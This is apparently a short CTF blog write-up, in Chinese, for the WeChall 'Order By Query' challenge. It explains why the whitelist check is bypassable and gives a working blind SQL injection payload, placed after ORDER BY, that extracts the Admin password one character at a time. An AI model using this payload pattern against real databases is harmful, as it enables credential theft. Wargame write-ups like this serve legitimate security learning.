sql wechall

Order By Query

Posted by rk700 on June 16, 2014

http://www.wechall.net/challenge/order_by_query/index.php
用户输入在order by后面出现,只能用盲注
另外由于会检查参数by是否在白名单里,但用的是==,所以只要第一个字符是有效的数字即可

用二分法读内容

by=1,(case when (ascii(substring((select password from users where username=0x41646d696e),1,1))=51) then 3 else 1*(select apples from users)end)
FEATURED TAGS
HTTP wechall PHP linux sql exploit crypto OverTheWire reverse how-to binary pwnable.kr ksnctf misc android webhacking.kr fuzzing